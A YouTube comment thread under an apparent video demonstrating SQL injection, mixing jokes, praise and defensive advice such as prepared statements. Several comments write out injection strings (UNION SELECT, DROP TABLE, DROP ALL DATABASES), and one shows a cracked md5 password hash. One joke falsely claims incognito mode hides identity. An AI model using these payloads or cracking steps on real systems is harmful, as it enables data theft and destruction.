Making your application insecure towards attacks and putting your user's sensitive informations at risk of being stolen and released is illegal. @jan harald: What is "illegal by community" supposed to mean?
Decades ago, my brother named his bowling team "select *". This was in the early days of computers, so there wasn't modern security. The bowling alley printed the statistics, and when his team arrived, the employee presented an entire ream of paper and demanded they choose a different name.
I love how he explains things non-pretentiously. It seems a lot of people in the computing field really like to think they're better than everyone else.
Prince Benny it’s usually not their fault. Having worked with Tech Mobs for the Gold Coast commonwealth games, it’s just how IT dudes are and there is actually a job for people to take what the IT guy says and explains it to the project manager in a way that makes sense.
Imagine naming your child "LIKE'%' UNION SELECT * FROM TABLEBASE" so that when they register its name, you'll get the information on all of the country's database
This is a very well done demonstration! I liked being able to see how it worked in an actual example. Someone ran one of those scripts on my site to try to hack my database a couple years ago. The only thing it helped me realize is that I needed stronger spam protection, because it left thousands of failed injection comments on one of my pages, haha.
htmlspecialchars() for the output as xss protection. in case of php & mysql it would be mysql_real_escape_string() against sql injections in quoted values. but people shouldn't think they would be save when just using these functions. someone can do an sql injection without using any control chars at all if you didn't put quotes around the variable in the query: for example "SELECT * FROM posts WHERE postId = $postId"... the value of $postId could just be "1 UNION (SELECT 1, 2, 3)-- " without any quotes. in this case you would be save with casting the variable to an int, but best practice in general is using prepared statements.
No, it is a SQL injection attempt, not an XSS attack, the hacker was using the comments form as a gateway to the database, just like Michael in the video used the search box to send malicious queries. The difference is a comments form will store those requests as comments while a search box doesn't store search queries.
BlackenGames lol, I can program in over 20 languages, including those two. The point is not to learn them, but to learn against them. Possible weaknesses you have to remember when programming.
SuperManitu1 Then you should be able to exploit things easily. I don't know how to program in a lot of languages. Only 2 and I know how to do some nice exploits.
It’s crazy how different my understanding of this video is since the first time I watched it. I watched it back in high school, now I’m halfway through a university degree and have taken web development courses... Funky.
I made a website many years ago, and obviously made sure SQL injection wasn't possible, and I also logged stuff, and I did see some people trying to do SQL injection on my website.
The whole computerphile series is just great. Much that I can only see through here, although I speak only moderately English. Your enthusiasm and your fascination for the topic leaves even a slightly boring topic to last interesting. And that with every clip.
I always struggled with some parts of this. But I finally understand how it works so I'd have to say this is probably the best explaination of SQL injections I've ever come across. Thanks
@@Rosson311 but even as a joke you shouldnt try it cause when police will be at your door ,it wont hold honestly. like, i go with a knife at your house and you call police and i tell them 'oh ,its was just a joke,for fun,didn't mean to do anything'. not so sure someone will bite that even if it would be truth.so yea, don't even think to try just to see if it works.you would be the dumbest hacker in that jail yard.
I'm only halfway through the video, Its easy to understand what he is trying to say due to those practical examples in a simplified way. Its half a decade old and still best videos to watch out for on this topic.
Imagine explaining that to inmates in jail: "I... I... put the wrong text in a database on purpose". Inmates be like: "Somebody get me a restriction order, you ain't coming 5 cells away from me, what is wrong with you!"
One of my accomplishments at my first job was rewriting all of our (then) inline SQL queries and stored procs in C# to implement SQL injection prevention! It was a lot of fun :) And very rewarding when I was done
The whole hash is $1$V32.4G/.$0PKnjhXYUmYLJZZ8vEt/b/ so i guess the salt is 'V32.4G/.'. I'm not familiar with the format of md5, but in bcrypt that would be the salt.
Yes correct. And that is the reason md5 is considered a bad choice of hashing algorithms to use for hashing passwords. It's very fast to brute force md5 hashes compared to eg. bcrypt with a cost setting of 15. It directly equates to cost (€) of the brute force cracking setup.
Reminds me of the days when I had to 'recover' lost wordpress credentials for customers. Luckily web security has gotten much better but this is still a very valid video.
Just to clarify: It's not a malformed query. You're actually getting outside of the query that the website wants you to. Basically, you get to create your own little query which is pretty terrible cause then some dude can query for everyone's passwords.
@@sieghart0515 I did a year and a half for getting on my teachers computer, taking a screenshot of his desktop, saving that screenshot as a jpeg then making that his desktop background... then removing his shortcuts and lowering his task bar.. so no matter how much he clicked, he got no where.
I had known and understood what sql injection was previously, but I had never heard of blind sql attacks and using database-specific syntax in order to obtain information on the underlying database. Very informative video
the first person to put the word 'an' before consonants like 's' that start with a vowel. Thank you. An 'r', people. Say AN 's', AN 'h', AN 's', etc. I know I'm not the only one.
The most scary fact about this is that it's still an issue in 2016. I did this kind of stuff 15 years ago and back then I already thought "this is way too easy". The bad news was that there were no such things as prepared statements, so you really had to do all the work with escaping.
I used to work for a consulting company and you'd be surprised how shitty the majority of companies are at protecting your data. Mostly smaller businesses, but even some of the large ones lack basic security measures. It was pretty eye opening.
"It should have used that single quote as a character, not as a control structure" damn that is really interesting and cool... Please (universe) give me the determination to get through HTML/CSS/JS/SQL... It just seems so neat and handy...
Back when I was a "code monkey" AKA programmer, I was once officially admonished by my supervisor for wasting time putting in error trapping. "If the customer wants that, they can pay for it" was what he told me... That company is still around today - I looked them up. Apparently one of their core values is "Enthusiastic, Passionate and Fun" but the fact is, crappy programming is the norm, not the exception.
When putting together a SQL driven site, I put all text input variables through a function which filters out all potentially hostile characters and replaces them with something which cannot be interpreted as SQL code. It could also be possible to get the PHP to check for multiple attempts to submit SQL injections. One or two could be accidental, but more than that could be viewed as an attack, so I could make the PHP block all traffic from that IP for an hour, or return some decoy tables, or even a fake page warning the hacker that a virus is being uploaded to their computer, complete with a progress bar :)
If you're still learning PHP, SQL and all that stuff and didn't already - please have a read on PDO and prepared statements. It's the "new" easy way of dealing with everything. :)
Ha! I encrypted user names and passwords back in 1992! The encryption wasn’t very sophisticated, but the bad guys didn’t know that. I feel so validated!
Hint: Just use incognito mode in your browser to never get caught. You're incognito when you use it so they will never find out who you are. Easy solution.
I love this channel, some videos I understand, and some I have no ******* idea what they are talking about. These guys are super epic and advanced. I'm an uber beginner LOL. Been learning the basics and enjoying it. Thank you for such incredible material, I really appreciate you guys, and of course, RUclips too is just simply awesome
That program you had was literally something I had to make for a class in web development. I think it was the PHP class. Thankfully, we also have a mandatory information security course I'm in now and learning about these. We did talk about making sure quotes don't get in, which is important.
At one point, I created and maintained a server. You have to know how to crack your own system to know how to defend it. I launched campaigns against my server on a somewhat regular basis. Great explanation.
This is actually an incredibly well explained bit of content. I know that its probably not going to make sense to 80% of people but if you know what is going on and youre just a bit new to all of this then it explains things in such a way that connects the dots for you. I wish i would have had this video at my fingertips 20 years ago lol.
As a learning web developer that uses php and sql all the time, this is pretty creepy. Luckily I learned to sanitize my queries early on, but I need to learn more about how hackers might attack a website.
Can you put this website somewhere out there on the internet? Because I'm SURE a lot of people watching this would love to try their own injections and have fun with it.
That would be pointless, first injection could be command to drop all tables and there would be nothing in the database and no fun for others. You can download XAMPP and create a simple database like this and do all queries like that inside web interface for PHPmyadmin on your own computer without even creating a separate website.
well if he would put it up somewhere, it could be taken down pretty easily in seconds: someone drops all tables, and voila, you can't even do anything anymore. This is like putting a bottle out on the street for everyone to break, if someone breaks it at first, then noone else can do it anymore because it's already broken.
Yeah I realized very soon after posting that comment that it would have to be "refreshed" very often or just done so that it doesn't break for everyone and basically would be a pain in the ass to do.
Usually you need to find out what type of hash they use. Then you could try a dictionary attack. Have a program try each word until the hashed value = the one you got.
I think you're misunderstanding what salting does, you can reverse lookup a hash by having a list of hashed common words/used passwords, lists of billions upon billions of possible passwords...what salting does is change each hash with a "salt". So having two of the same passwords would produce two different hashes, thus making reverse lookup a less likely decryption method.
Maybe the best thing to do is to ignore the comment. Though, more better way of dealing with it is , maybe, to thank that "basic" guy for the work he is doing.
With the search engine, another way to prevent it is, give every product a tag and give the users the impression that they can write whatever they want in the search engine, while in reality they can actually only pick from predetermined terms. So, any SQL injection would be useless there. Of course this would require more effort though.
i guess it would work but it would make the search engine much less accurate. either that or you'll be writing 300 tags for every item. It also can't work in every search box, what if you're searching for a student by name, or a movie?
How to avoid jail: "I`ve given myself the permission"
officer i swear what i did wasnt illegal, i gave myself permission to rob him!
@@elisttm ok ur free
XDDD
@@elisttm this reads like a privilege escalation exploit lol
I'm using it
..what is illegal? running sql attack or making shitty web apps? Coz my real name is "'; DROP table users; SELECT '"
Both.
releasing the information is illegal.
attacking someone without their permission is illegal by law
making shitty apps is illegal by community
Making your application insecure towards attacks and putting your user's sensitive informations at risk of being stolen and released is illegal.
@jan harald: What is "illegal by community" supposed to mean?
I wonder if you could change your legal name to that.
the intro had "" and the outro ""... smart... love the attention to detail
what that means ?
oh now that makes sense :D Thanks
Being the pedantic developer I am, it's more like XML since HTML doesn't support a tag.
What are u doing here if u don't know that?? lol
@@sirturnables learning.
imagine not giving yourself permission to do this on your own website and then you sue yourself, win the lawsuit and then land in prison
Well, at least you would be able to win your own money. Thats more than what can be said for some married / divorced folks.
You’re pretty damn right m8
mmmMM the court fee and if you have 1000 iq your lawyar takes about 30%
Then become mr robot
Write it off as a tax deduction.
Decades ago, my brother named his bowling team "select *". This was in the early days of computers, so there wasn't modern security. The bowling alley printed the statistics, and when his team arrived, the employee presented an entire ream of paper and demanded they choose a different name.
Hehehe... funny. It's like the first Unix systems where you couldn't have a user named "Ed".
@@bsvenss2 Would it start the editor?
@@karldavis7392 it would lol
Me: Can I SQL Injection Attack your website
Me:Sure
That's what he did
Imagine he has schizofrenia and fires a lawsuit against himself.
Or simply changes his mind.
*Mr. Robot intesifies*
😂
I love how he explains things non-pretentiously. It seems a lot of people in the computing field really like to think they're better than everyone else.
Prince Benny it’s usually not their fault.
Having worked with Tech Mobs for the Gold Coast commonwealth games, it’s just how IT dudes are and there is actually a job for people to take what the IT guy says and explains it to the project manager in a way that makes sense.
Yeah he's a great teacher too
Or with a foreign accent so heavy you can't even tell they are speaking English.
Yeah we do 😎
Yes we are
Thank you Peter Parker
He's the cool version of Peter Parker, from Spiderman 3
Underrated post
I thought I was the only mofo thinking he looked like Peter Parker from Spider-Man 😂
Or Frodo from the lordof the rings
FRODO!
alright youtube, this has been in my recommended for 2 years now, ill watch it, you win.
Underrated
Interesting and informative, but the other guy is almost as basic as "So, what's that in front of you? Is it a computer?"
lowkey joke
You just wasted 2 years
@@sachinfulsunge9977 hahaha
The interviewer thought the text editor was already the hacking part
I noticed his excitement as well.
I loved when he nervously asked...so where are u typing that now....as if the whole world was going to blow up >^
you know he probably knows but he just asks for the content right?
He knows
at least he's willing to learn
Imagine naming your child "LIKE'%' UNION SELECT * FROM TABLEBASE" so that when they register its name, you'll get the information on all of the country's database
Travis Petit probem is, you should rather imagine that names of people would contain else than alphabet (numbers and symbols)
Why is PHP better then Python please?
^^^^^^^^^^
US government sites use Drupal which uses PHP, so US government actually uses PHP
my birth name is actually ':-- DROP DATABASE
This is a very well done demonstration! I liked being able to see how it worked in an actual example.
Someone ran one of those scripts on my site to try to hack my database a couple years ago. The only thing it helped me realize is that I needed stronger spam protection, because it left thousands of failed injection comments on one of my pages, haha.
That sounds more like xss than sql injection
You need some of that htmlspecialchars(), a stripslashes() and str_replace()
htmlspecialchars() for the output as xss protection.
in case of php & mysql it would be mysql_real_escape_string() against sql injections in quoted values.
but people shouldn't think they would be save when just using these functions. someone can do an sql injection without using any control chars at all if you didn't put quotes around the variable in the query: for example "SELECT * FROM posts WHERE postId = $postId"... the value of $postId could just be "1 UNION (SELECT 1, 2, 3)-- " without any quotes.
in this case you would be save with casting the variable to an int, but best practice in general is using prepared statements.
meh, forgot about the ; in the example injection - but you get the point...
use prepared statements / stored procedures :-)
No, it is a SQL injection attempt, not an XSS attack, the hacker was using the comments form as a gateway to the database, just like Michael in the video used the search box to send malicious queries. The difference is a comments form will store those requests as comments while a search box doesn't store search queries.
The hacking videos are the best and most interesting for me as comp science student. Keep them coming!
Just wait until you learn MySQL and Javascript. Then you'll be able to learn some very interesting things.
BlackenGames lol, I can program in over 20 languages, including those two. The point is not to learn them, but to learn against them. Possible weaknesses you have to remember when programming.
>Javascript
When I'm feeling like a masochist perhaps.
Blaze I really hate Javascript, but you should try typescript. I have made my peace with javascript that way
SuperManitu1 Then you should be able to exploit things easily.
I don't know how to program in a lot of languages. Only 2 and I know how to do some nice exploits.
It’s crazy how different my understanding of this video is since the first time I watched it. I watched it back in high school, now I’m halfway through a university degree and have taken web development courses... Funky.
Got Same feelings haha
i feel attacked
Just came back after 5 years and I'm second year into IT
This is the best explanation of SQL injection video ever. I've recommended it to a non-technical friend and he got the info-sec job.
Instructions unclear, NSA is outside my house.
😂😂😂
John Doe FAV hahahahaa
😂😂😂
WTF HOW DID YOU GET NSA OUTSIDE YOUR HOUSE OBVIOUSLY YOU UNDERSTOOD THE INSTRUCTIONS ARE YOU IN PRISON NOW?
blackham7 wooosh
So the best defense is to disable the "Search" box
Only criminals need search boxes.
The best defence is to take down your own website, destroy your computer, isolate yourself from technology & civilisation and go live in the woods.
No client can't hack you if you have no clients #LifeHack
@@saeedbaig4249
Nah, silly lol Just ban "UNION" from your search box...
From memory it's possible to use your browser search bar to run an SQL query
I made a website many years ago, and obviously made sure SQL injection wasn't possible, and I also logged stuff, and I did see some people trying to do SQL injection on my website.
peas give me website address and permission to practice pen test
@@211212112 This was well over 10 years ago. That website no longer exists.
anti/HUMAN Designs :(
Okay RUclips, I'll watch it. Recommending it to me for years.
The whole computerphile series is just great. Much that I can only see through here, although I speak only moderately English.
Your enthusiasm and your fascination for the topic leaves even a slightly boring topic to last interesting.
And that with every clip.
I thought I loved Scott. Then I discovered this man, the man that doesn't pronounce SQL like Sequel. He's brilliant
oh snap i've been pronouncing it incorrectly
Us in the UK dont tend to prononce it sequel...
@@jackrogers1115 Well isn't Tom Scott from the UK, though? You see, he's the one in question who tends to do so.
@@13am22 what
In the uk, we tend to say s q l, not sequel. Thats what i'm say. And yes hes from the uk
I always struggled with some parts of this. But I finally understand how it works so I'd have to say this is probably the best explaination of SQL injections I've ever come across. Thanks
This guy is by far the best on this channel. Especially with his practical examples!
This is defense against the dark arts for Computer Science
OKAY RUclips I FINALLY WATCHED IT! This video has been in my recommended for years now.
Useful to see as this does work on my website.
Baldeep Birak so what website you run.? Asking for a friend lol
Cheeky.
Hey now, let's none of us go Ball Deep on Baldeep.
mind if I take a look on your website?
@@Rosson311 but even as a joke you shouldnt try it cause when police will be at your door ,it wont hold honestly. like, i go with a knife at your house and you call police and i tell them 'oh ,its was just a joke,for fun,didn't mean to do anything'. not so sure someone will bite that even if it would be truth.so yea, don't even think to try just to see if it works.you would be the dumbest hacker in that jail yard.
That's why I use prepared statements everywhere, even when I get something from my own database, and do a query on something else.
you gave yourself permission? is that in writing? is it notarized? who knows, maybe you'll change your mind and press charges on yourself!
I'm only halfway through the video, Its easy to understand what he is trying to say due to those practical examples in a simplified way. Its half a decade old and still best videos to watch out for on this topic.
Imagine explaining that to inmates in jail: "I... I... put the wrong text in a database on purpose".
Inmates be like: "Somebody get me a restriction order, you ain't coming 5 cells away from me, what is wrong with you!"
Funny haha
This guy is quality, I could listen to him all day
A 2rd degree attack would be me naming my children ";--"
LOL I miss-typed 2 instead of 3 hahaha
Bobby Tables would be proud of you!
Little Bobby Tables!! :)
2rd ? "secord" ? :))
CuZoSky
twoerd
user name consisting of SQL? must be Little Bobby Tables
rchandraonline I know of that site, but this is a full in depth explanation as to exactly how it works.
I will name my son as Little Bobby Tables
I suddenly remember a man named "null"
Where's the "Students" table?
Oh, I love that comic. "Oh little Bobby Tables, we call him."
I never understood SQL injection untill I watched this video...bow to you..🙇
One of my accomplishments at my first job was rewriting all of our (then) inline SQL queries and stored procs in C# to implement SQL injection prevention! It was a lot of fun :) And very rewarding when I was done
Now this is art. I can totally imagine people do stuff like this cause it's fun. Like chess.
Juan2003gtr why are you calling him a noob?
Like gambling.
I learnt more from this video than my entire DBMS coursework.
The password for user Joe is 'administrator'.
./john /vagrant/x --show
?:administrator
1 password hash cracked, 0 left
What was the salt?
The whole hash is
$1$V32.4G/.$0PKnjhXYUmYLJZZ8vEt/b/
so i guess the salt is 'V32.4G/.'. I'm not familiar with the format of md5, but in bcrypt that would be the salt.
vinkuu So, essentially, if you get into the database, you can use the salt that is with the password to crack it by brute forcing it?
Yes correct. And that is the reason md5 is considered a bad choice of hashing algorithms to use for hashing passwords. It's very fast to brute force md5 hashes compared to eg. bcrypt with a cost setting of 15. It directly equates to cost (€) of the brute force cracking setup.
Or just type in administrator??????
Reminds me of the days when I had to 'recover' lost wordpress credentials for customers. Luckily web security has gotten much better but this is still a very valid video.
Wordpress has never been secure in any way And it should never be used commercially
this was one of the most interesting videos I have seen in a while. gotta watch more now
Dude this guy is crazy I love watching vids with this dude
Would love to see a video on second order SQL injections!
You don't go to jail if you don't get caught.
Iceborn Gauntlet probably you.
Chase Brower no, not just me. EVERYONE.
Frank zapper
you don't go to jail if you never try to learn this stuff. * makes the meme face *.
That's what Hillary told me.
Subcription at first video :) This is the best explanation of an SQL injection that I've ever heard. Pretty sure that even non-coders would understand
Quantity in stock: A D M I N
Product name: G E O R G E
That's why you use PDO and bind requests. Also don't forget to sanitize user input before the query
WPF in C# 2010 Book on the background - Busted!
alert("hello world");
-I'm in.
Alternative title: Tyrell Wellick runs an SQL Injection attack.
XD
That nearly finished Rubik's cube on his desk is playing havoc with my OCD
here to remind you of that unfinished cube lol
😭
Thanks! This video explains it better than my database subject lectures.
Just to clarify: It's not a malformed query. You're actually getting outside of the query that the website wants you to. Basically, you get to create your own little query which is pretty terrible cause then some dude can query for everyone's passwords.
"Ah, I'm sure my website will be fine."
*checks it*
"ohno"
actually underrated 😂
Oof 😅
SurprisedPikachu.jpg
"anyway..."
Felt like I was listening to an SQL injection tutorial as presented by James Acaster. And loved every second of it of course
Amazing how this was posted in 2016 and these were concerns I had to address in 1996. Filtering, stored procedures and permissions are your friend.
I really love how Mike stepped up his game lately. Easily one of my regulars on Computerphile, keep it up!
I got 15 years for sql injection one time
absolute mad man
but did you though?
I got executed for MITM attack.
I got a two days torture for changing the input type from password to text
I got sentenced lethal injection for typing on console
@@sieghart0515 I did a year and a half for getting on my teachers computer, taking a screenshot of his desktop, saving that screenshot as a jpeg then making that his desktop background... then removing his shortcuts and lowering his task bar.. so no matter how much he clicked, he got no where.
It’s 2022 and still a valid issue!!!
I had known and understood what sql injection was previously, but I had never heard of blind sql attacks and using database-specific syntax in order to obtain information on the underlying database. Very informative video
the first person to put the word 'an' before consonants like 's' that start with a vowel. Thank you. An 'r', people. Say AN 's', AN 'h', AN 's', etc. I know I'm not the only one.
Thank you RUclips for suggesting me this video after my DBMS exam .....wouldve done great if i had watched this video
The most scary fact about this is that it's still an issue in 2016. I did this kind of stuff 15 years ago and back then I already thought "this is way too easy". The bad news was that there were no such things as prepared statements, so you really had to do all the work with escaping.
I used to work for a consulting company and you'd be surprised how shitty the majority of companies are at protecting your data. Mostly smaller businesses, but even some of the large ones lack basic security measures. It was pretty eye opening.
"It should have used that single quote as a character, not as a control structure" damn that is really interesting and cool... Please (universe) give me the determination to get through HTML/CSS/JS/SQL... It just seems so neat and handy...
Just perfect!!! Rather than talking about how it's done, show how it's done.
Back when I was a "code monkey" AKA programmer, I was once officially admonished by my supervisor for wasting time putting in error trapping. "If the customer wants that, they can pay for it" was what he told me...
That company is still around today - I looked them up. Apparently one of their core values is "Enthusiastic, Passionate and Fun" but the fact is, crappy programming is the norm, not the exception.
When putting together a SQL driven site, I put all text input variables through a function which filters out all potentially hostile characters and replaces them with something which cannot be interpreted as SQL code. It could also be possible to get the PHP to check for multiple attempts to submit SQL injections. One or two could be accidental, but more than that could be viewed as an attack, so I could make the PHP block all traffic from that IP for an hour, or return some decoy tables, or even a fake page warning the hacker that a virus is being uploaded to their computer, complete with a progress bar :)
If you're still learning PHP, SQL and all that stuff and didn't already - please have a read on PDO and prepared statements. It's the "new" easy way of dealing with everything. :)
make it return what they would want to see, but the wrong information. a fake error or a fake full table
What was the price for the 7mm nails? I'm re-upholstering a chair currently and think 8mm would be too long.
Thanks.
I like how the interviewer initially couldn't get around the fact that all the instructor was doing is just writing out the "code" in a text editor.
Ha! I encrypted user names and passwords back in 1992! The encryption wasn’t very sophisticated, but the bad guys didn’t know that.
I feel so validated!
This why we should use PreparedStatements in PHP , JSP, Servlets, C# and ASP.. :)
That wasn't alway a thing before sadly. As of today, it's the only way to go basically. :)
Me: Going through lecture slides to past my sql exam.
You: Playing black magic with sql query.
"; DROP ALL DATABASES; --
Thats bad
:D
OMG...
Only if the account has been granted DROP permissions. For a site that just shows records it should only be created and given SELECT permission.
+Chris Ellis
Do you really think someone who isn't going to escape user input, would think about that?
Because I honestly don't.
this explanation is so far superior to the other guy's coffeeshop explanation. The visualization is very important.
I learned more about databases in this one video than I did during a semester long class in Uni about databases.
15:15 "Thank you for saving us some time." - Malicious people.
the illegal part of this is having an unsolved cube on your desk with super easy PLL case :c
Hint: Just use incognito mode in your browser to never get caught. You're incognito when you use it so they will never find out who you are.
Easy solution.
Ur joking, right? :)
@@romankrivocheev4434 Yes. But i saw some people in the wild who actually think that way :D
Or just use Tor
@@ItsAstie `would that work tho?
On a serious note does using free vpn work?
I love this channel, some videos I understand, and some I have no ******* idea what they are talking about. These guys are super epic and advanced. I'm an uber beginner LOL. Been learning the basics and enjoying it. Thank you for such incredible material, I really appreciate you guys, and of course, RUclips too is just simply awesome
That program you had was literally something I had to make for a class in web development. I think it was the PHP class. Thankfully, we also have a mandatory information security course I'm in now and learning about these. We did talk about making sure quotes don't get in, which is important.
As a SQL beginner this was super helpful, thank you.
This should be basic education at this point, I’m so pissed nobody was learning or teaching this in school
Depends on the school were you at.
Totally agree.
Fellow Sublime Text user
Amazing band
take my like hahahaha
I'm serious tho.
sublime text
Atom is better
just started doing a Cyber Security Course at college, enjoying your videos to supplement my learning :)
At one point, I created and maintained a server. You have to know how to crack your own system to know how to defend it. I launched campaigns against my server on a somewhat regular basis. Great explanation.
Insightful..Thank you for taking the time to go through it..Not a database guy but found it very interesting.
this is weak attack it can simply prevented by escaping chars or by creating sql stored procedures if you know how to use them.
Abbass: you'r right! That cross my mind too! :)
5:42 - this was the first time I dropped my jaw
This is actually an incredibly well explained bit of content. I know that its probably not going to make sense to 80% of people but if you know what is going on and youre just a bit new to all of this then it explains things in such a way that connects the dots for you. I wish i would have had this video at my fingertips 20 years ago lol.
learnt about this in my computer science class today and now i feel like an absolute badass
As a learning web developer that uses php and sql all the time, this is pretty creepy. Luckily I learned to sanitize my queries early on, but I need to learn more about how hackers might attack a website.
Can you put this website somewhere out there on the internet? Because I'm SURE a lot of people watching this would love to try their own injections and have fun with it.
That would be pointless, first injection could be command to drop all tables and there would be nothing in the database and no fun for others.
You can download XAMPP and create a simple database like this and do all queries like that inside web interface for PHPmyadmin on your own computer without even creating a separate website.
well if he would put it up somewhere, it could be taken down pretty easily in seconds: someone drops all tables, and voila, you can't even do anything anymore. This is like putting a bottle out on the street for everyone to break, if someone breaks it at first, then noone else can do it anymore because it's already broken.
Yeah I realized very soon after posting that comment that it would have to be "refreshed" very often or just done so that it doesn't break for everyone and basically would be a pain in the ass to do.
Actually you can write your own script to do it. It's really just basic coding.
Check out hackthissite.org, they have some easy and some hard websites for you to hack into!
+Computerphile could you do a video on hashing/breaking hashes?
Coming soon - using a 4x Titan X GPU server ;)
Usually you need to find out what type of hash they use. Then you could try a dictionary attack. Have a program try each word until the hashed value = the one you got.
md5 :)
I think you're misunderstanding what salting does, you can reverse lookup a hash by having a list of hashed common words/used passwords, lists of billions upon billions of possible passwords...what salting does is change each hash with a "salt". So having two of the same passwords would produce two different hashes, thus making reverse lookup a less likely decryption method.
Is this the actual Michael from the video. If it is I'm happy you're reading the comments. These videos have been quite refreshing on computerphile.
I never sanitize form input. Livin' on the edge!!!
that's why you use frameworks that do sql injection prevention for you, or simply just escape the input you throw to your database.
Interesting and informative, but the other guy is almost as basic as "So, what's that in front of you? Is it a computer?"
Whats that, a text editor? And the letters that you type on this key device appears on it ? Fantastic !
Maybe the best thing to do is to ignore the comment. Though, more better way of dealing with it is , maybe, to thank that "basic" guy for the work he is doing.
@@mbarekzacri4973 he could do better thats what the comments wants to say
Are you talking about Tom Scott?
He asked it for the audience. He run this channel. Obviously he would know about Sublime text.
With the search engine, another way to prevent it is, give every product a tag and give the users the impression that they can write whatever they want in the search engine, while in reality they can actually only pick from predetermined terms. So, any SQL injection would be useless there. Of course this would require more effort though.
i guess it would work but it would make the search engine much less accurate. either that or you'll be writing 300 tags for every item.
It also can't work in every search box, what if you're searching for a student by name, or a movie?
Yep, this is what we have SQL parameter solutions for, in many programming languages. To prevent that trouble.
I think this guy is great. Consider yourself with him teaching you hands on in some real lab/ classes. Better than other show offs on RUclips.
I actually wanted to write a bit of fanfic about a character SQL-injecting an A.I. I'm doing RRRRESEARCH! :L